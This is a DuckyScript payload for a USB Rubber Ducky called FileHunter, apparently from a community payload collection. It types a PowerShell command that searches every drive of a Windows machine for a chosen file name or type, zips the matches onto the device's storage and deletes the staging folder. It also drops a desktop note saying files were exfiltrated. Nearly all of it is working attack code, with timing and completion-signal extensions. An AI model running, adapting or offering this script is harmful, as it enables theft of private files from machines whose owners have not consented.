1
REM Title:         FileHunter
2
REM Description:   Crawls all drives of the target system for a specific file or file type, to then compress and exfiltrate them to the Ducky.
3
REM Author:        0i41E
4
REM Version:       1.0
5
REM Category:      Exfiltration
6
REM Attackmodes:   HID, Storage
7

8
ATTACKMODE HID STORAGE
9

10
REM Extension made by Korben to increase speed
11
EXTENSION DETECT_READY
12
    REM VERSION 1.1
13
    REM AUTHOR: Korben
14

15
    REM_BLOCK DOCUMENTATION
16
        USAGE:
17
            Extension runs inline (here)
18
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
19
            boot delay
20

21
        TARGETS:
22
            Any system that reflects CAPSLOCK will detect minimum required delay
23
            Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
24
    END_REM
25

26
    REM CONFIGURATION:
27
    DEFINE #RESPONSE_DELAY 25
28
    DEFINE #ITERATION_LIMIT 120
29

30
    VAR $C = 0
31
    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
32
        CAPSLOCK
33
        DELAY #RESPONSE_DELAY
34
        $C = ($C + 1)
35
    END_WHILE
36
    CAPSLOCK
37
END_EXTENSION
38

39
REM Extension by 0i41E, to signalize the successful execution of the payload
40
EXTENSION DETECT_FINISHED
41
    REM VERSION 1.0
42
    REM AUTHOR: 0i41E
43

44
    REM_BLOCK DOCUMENTATION
45
        USAGE:
46
            Use the function Detect_Finished() to signal the finished execution of your payload.
47
    END_REM
48

49
    REM CONFIGURATION:
50
    DEFINE #PAUSE 150
51
    FUNCTION Detect_Finished()
52
        IF ($_CAPSLOCK_ON == FALSE)
53
            CAPSLOCK
54
            DELAY #PAUSE
55
            CAPSLOCK
56
            DELAY #PAUSE
57
            CAPSLOCK
58
            DELAY #PAUSE
59
            CAPSLOCK
60
            ATTACKMODE OFF
61
        ELSE IF
62
            CAPSLOCK
63
            DELAY #PAUSE
64
            CAPSLOCK
65
            DELAY #PAUSE
66
            CAPSLOCK
67
            ATTACKMODE OFF
68
        END_IF
69
    END_FUNCTION
70
END_EXTENSION
71

72
REM Define the file name or type by using a wildcard i.e. *.pdf
73
DEFINE #FILENAME example.jpg
74
DEFINE #NAME Ducky
75

76
DELAY 1000
77
GUI r
78
DELAY 500
79
STRINGLN powershell -nop -noni
80
REM You may want to add Windows_Elevated_Execution, if you want full access to all drives and directories
81
DELAY 2000
82
STRINGLN_POWERSHELL
83
$out = ((gwmi win32_volume -f 'label=''#NAME''').Name)+"out.zip"
84
$dir = [System.IO.Path]::GetDirectoryName($out)
85
if (-not (Test-Path $dir)) {
86
    New-Item -ItemType Directory -Path $dir
87
}
88
$store = "$env:TEMP\Found"
89
if (Test-Path $store) {
90
    Remove-Item -Recurse -Force $store
91
}
92
New-Item -ItemType Directory -Path $store | Out-Null
93
Get-PSDrive -PSProvider FileSystem | ForEach-Object {
94
    $drive = $_.Root
95
    try {
96
        Get-ChildItem -Path $drive -Recurse -Filter "#FILENAME" -ErrorAction SilentlyContinue |
97
        ForEach-Object {
98
            $dest = Join-Path -Path $store -ChildPath $_.Name
99
            Copy-Item -Path $_.FullName -Destination $dest -Force
100
        }
101
    } catch {
102
        Write-Host "Error: drive ${drive}: $_" -ForegroundColor Red
103
    }
104
}
105
if (Test-Path $out) {
106
    Remove-Item -Force $out
107
}
108
Write-Host -ForegroundColor Yellow "Saving files to Ducky. This may take a while..."
109
Compress-Archive -Path "$store\*" -DestinationPath $out
110
Remove-Item -Recurse -Force $store; echo "Certain of your Files where exfiltrated, using a Rubber Ducky (Identified as #NAME)" > $env:HOMEPATH\Desktop\fyi.txt
111
;(New-Object -ComObject wscript.shell).SendKeys('{CAPSLOCK}');ExIt
112
END_STRINGLN
113
DELAY 150
114
ENTER
115
DELAY 250
116
WAIT_FOR_CAPS_ON
117
DELAY 250
118
Detect_Finished()
119